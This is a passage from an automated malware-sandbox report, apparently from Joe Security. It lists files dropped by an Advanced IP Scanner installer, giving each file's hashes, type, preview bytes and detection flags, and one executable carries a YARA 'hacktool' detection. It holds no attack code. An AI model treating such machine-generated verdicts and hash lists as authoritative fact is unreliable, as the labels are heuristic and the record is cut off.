SHA-512:	5BEA33C25F3A28D1138834F6E6D8C2D9BAEAFEE39833980C1EC022ED8EEAE75453747CF844C31232F9F46D77C427F388CF65B070F03ED5C81B166D85BBD41379
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stanje:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacijski sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvajalec:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Uporabnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarji:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Storitev</center></b></td><td><b><center>Podro

C:\Program Files (x86)\Advanced IP Scanner\is-2AKL7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21326
Entropy (8bit):	5.601982778539758
Encrypted:	false
SSDEEP:	384:4DlwToFrc4xM4iwF3sE5nARVIAgNv95UWr/LGLKbTR1Zo:4DlwTsc4O4i8sE5ncWjz5UWr/y/
MD5:	B961B562628E357221F12EB6A212860C
SHA1:	35E6905D0410CEDC12B77EA8735CEDCB74913B25
SHA-256:	5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
SHA-512:	8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
Malicious:	false
Preview:	<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3...y......y......%...F..0...q.+.......+......+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.\|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&........5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I

C:\Program Files (x86)\Advanced IP Scanner\is-2K0TF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.046229749504995
Encrypted:	false
SSDEEP:	192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
MD5:	BFB08FB09E8D68673F2F0213C59E2B97
SHA1:	E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
SHA-256:	6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
SHA-512:	E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-2R2LP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.78207214825378
Encrypted:	false
SSDEEP:	24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
MD5:	470C4551612D8025E2C1FF7129C75577
SHA1:	BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
SHA-256:	8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
SHA-512:	21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center

C:\Program Files (x86)\Advanced IP Scanner\is-2U0U8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.948212808065758
Encrypted:	false
SSDEEP:	192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
MD5:	39D81596A7308E978D67AD6FDCCDD331
SHA1:	A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
SHA-256:	3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
SHA-512:	0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-379LU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.128056579045673
Encrypted:	false
SSDEEP:	24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
MD5:	1C7DAA7B7C3119E37B599739F3372A97
SHA1:	D8E90B30F5D754C8B7623CF6FE3E5D298E620201
SHA-256:	DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
SHA-512:	ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">..

C:\Program Files (x86)\Advanced IP Scanner\is-3CKII.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961849079425489
Encrypted:	false
SSDEEP:	192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
MD5:	8F8A47617DFD829A63E3EC4AFF2718D9
SHA1:	1D7DC26BB9C78C4499514FB3529B3478AECF7340
SHA-256:	6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
SHA-512:	D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-3FR82.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	319
Entropy (8bit):	4.379102897885305
Encrypted:	false
SSDEEP:	6:CwTA5/S39XWIlkHKVDQEoE6J2lRWRYrWlp/IM1gEE6J2lRWRYrWlp2lbIMWSEE/1:HA0tR5pQlXJ2lRWGcPXJ2lRWG8+
MD5:	FA3064E9270B3CE8D90EF2C4E00277C5
SHA1:	6E55C6F99FDA993DD301172900AD96DE2258C6FC
SHA-256:	BA4E20952EAE5DD959F1C0D3A4B9726A37BD81645D9DDE6B83C1E367032C77CD
SHA-512:	12A796A7FA23B325B172CF4A1491A146117A0C938D1C64369EB1B7DF7277676832B32D5221383E48E8E244225E370DC75B69F5C7638A4A7D4FF6121A26032AC1
Malicious:	false
Preview:	<.d....!..`...B.............O.....P..q.....i........$.C.&.h.e.c.k. .f.o.r. .u.p.d.a.t.e.s..........Check for &updates.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.S.e.r.v.e.r..........Install Radmin Server.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.V.i.e.w.e.r..........Install Radmin Viewer.....VMain........

C:\Program Files (x86)\Advanced IP Scanner\is-3PIAE.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26044
Entropy (8bit):	5.23160860836295
Encrypted:	false
SSDEEP:	384:USrTnWGBewzY6ek4qnVBarz5QVZSp8R0SRWEN8ejwVRH9Pkq0+u3lZR:U6bWGBe96YqVBarz5QVZ1pRDOeIJtKT
MD5:	D7B6ACB98C438672B2D6E2DA7720191D
SHA1:	3F2CCE40CA80158F1A24258309E78978A8915C85
SHA-256:	DDB5D2E12292BF444B24067E959DE8EB60F7158C1FD7717433739B3E3752B539
SHA-512:	ECCE6C5D0BE732DB27EAF8AD76D425AEC6A852DC41F9501CCAF2E755B7EE42735291FB199139A196DBC017A33B2CC54018CDE8E044E1E7C972C23506C75ACB6D
Malicious:	false
Preview:	<.d....!..`...B..........R....;...L...;.......;.......;...m...;..>....O..U....[..Q0...^..+....^..Mx..(5...{..G.......H,..J...K...:...N:...b..V...?{.._...V4......%.......J....y..KI......................RV...t..'7...t..K....t..T......;....j......5t......@...=Q..H5..S...f...,.......@,.......G...........~.......`..2....e..TM......Ts.......h. =...A#..y......y...Y..%..!...0..!..+.......+.......+....V.+......+....#..G.......G....'..H0...T..Hw9...Y.Hw9.....I....%t.J6......J6......J6....p.J6...C..LD....t.L.b..T..M.S..<..R.......V....,M.Wi...S..W.T...5.Z.\|..Ls.[f3..O..gc......w0K..B..H...".......U....T...I..."..0....~..2~.. d..@....T.....2...........St......Y-.9.E..;:.L.#..[..M$o.....e.......l8...2....^..C...I....2......=~......M3......S3..>......>...L..3..+...l...E.......5Z.5.l..XK.AV...%5.y....Q....0..M.......L.......R...tb..1.......................N1......8h......I..(....M..1V...&B.R....-..W.<..X..f.~...D......04..1........^..1....5...y..........c..@..;6...Z=.q.J..JF..I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-3QF6V.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21282
Entropy (8bit):	5.593895866111406
Encrypted:	false
SSDEEP:	384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
MD5:	6885AC8F42A02A32B59AA84D330925C3
SHA1:	A070B4B8BF1128197681487D332168A537107FB9
SHA-256:	2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
SHA-512:	4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
Malicious:	false
Preview:	<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...\|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3...y......y......%......0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.\|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

C:\Program Files (x86)\Advanced IP Scanner\is-3UKOV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2080
Entropy (8bit):	4.902799949328129
Encrypted:	false
SSDEEP:	48:b1+7UxUhUZU+UeUQUCUyUCUJUZUUoUH0UAUvUlU7UJUQU+UYD8UCtZUn+:xL+O2Z5bNdNG2y/rMyYGb6Ct2n+
MD5:	64D0C8B9E985CFD51786E85509000617
SHA1:	65FC3558C0BED0CDECFCDAF9BA55F7EFACCBC694
SHA-256:	F3A60BD72994B19FB680F5071DAA675A6A07FE3805522F26456958A260999FCD
SHA-512:	DEB626895CC5C445F99214F26FB605BD5D9787E0545224A5E2B51E33371B9A6E88533E5F443FE72B619959391BA5183C40EC50F76D46BD1313BB062EA0679F96
Malicious:	false
Preview:	<hr>..<h3 dir="rtl" align="right" style="margin-left:2em">{name}</h3><p></p>..<table dir="rtl" align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right" style="padding-left:1em"><b>.....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right" style="padding-left:1em"><b>..... .....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right" style="padding-left:1em"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right" style="padding-left:1em"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right" style="padding-left:1em"><b>....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right" style="padding-left:1em"><b

C:\Program Files (x86)\Advanced IP Scanner\is-3UOHG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1681960
Entropy (8bit):	6.535592110075899
Encrypted:	false
SSDEEP:	49152:N7MNjXLsvFfAhpjccQ1hhTlPrLFhNG2y+L+aJwDcN:0jXL2mboRRhrL42yE
MD5:	B3411927CC7CD05E02BA64B2A789BBDE
SHA1:	B26CFDE4CA74D5D5377889BBA5B60B5FC72DDA75
SHA-256:	4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5
SHA-512:	732C750FA31D31BF4C5143938096FEB37DF5E18751398BABD05C01D0B4E5350238B0DE02D0CDFD5BA6D1B942CB305BE091AAC9FE0AAD9FC7BA7E54A4DBC708FD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AdvancedIPScannerHacktool, Description: Yara detected Advanced IP Scanner Hacktool, Source: C:\Program Files (x86)\Advanced IP Scanner\is-3UOHG.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........lj..............u........j......x.......x.......d.......f.......x.......x.......f.......c.......c.......f..............'x......'x..`...'x..............'x......Rich............................PE..L....gb..........".................U.............@..........................P............@..................................3.......... p..............(....p..0....R..T....................S.......R..@...............d*...........................text.............................. ..`.rdata..b...........................@..@.data........0...4..................@....rsrc... p.......r...H..............@..@.reloc..0....p......................@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-43K8A.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22208
Entropy (8bit):	6.906399541614446
Encrypted:	false
SSDEEP:	192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
MD5:	779A8B14C22E463EA535CBCA9EA84D49
SHA1:	4620531D5291878C10D6E3974F240B98BC7FB4B9
SHA-256:	FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
SHA-512:	08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-4OBJP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.993015464813673
Encrypted:	false
SSDEEP:	192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
MD5:	FC68978ABB44E572DFE637B7DD3D615F
SHA1:	47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
SHA-256:	DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
SHA-512:	7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-4TRAP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.790118218856679
Encrypted:	false
SSDEEP:	24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
MD5:	5AD712B9C416EE21623D620AB6019FB4
SHA1:	51DF096A58D6DF2A7CE33E22511C671883F2228C
SHA-256:	38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
SHA-512:	608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent

C:\Program Files (x86)\Advanced IP Scanner\is-5ISJ5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28292
Entropy (8bit):	5.300323619618019
Encrypted:	false
SSDEEP:	384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
MD5:	70059C7809B9DB196A6A58588536B7D6
SHA1:	6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
SHA-256:	7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
SHA-512:	EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
Malicious:	false
Preview:	<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)\|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8\|...e..\M......\s......... =...G...y...b..y...%..%..%X..0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.\|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-68B2P.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28669
Entropy (8bit):	4.635479137963866
Encrypted:	false
SSDEEP:	384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
MD5:	A5D24342E9B32AD9714C091BB135D180
SHA1:	7B193290CFE8190B60122C2219972512695E5D68
SHA-256:	2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
SHA-512:	140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
Malicious:	false
Preview:	<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK..y......y......%..&...0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.\|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V.....R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-6E54C.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.02455319040347
Encrypted:	false
SSDEEP:	192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
MD5:	E70D8FE9D21841202B4FD1CF55D37AC5
SHA1:	FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
SHA-256:	E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
SHA-512:	BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-6IECG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.0782836442636174
Encrypted:	false
SSDEEP:	384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
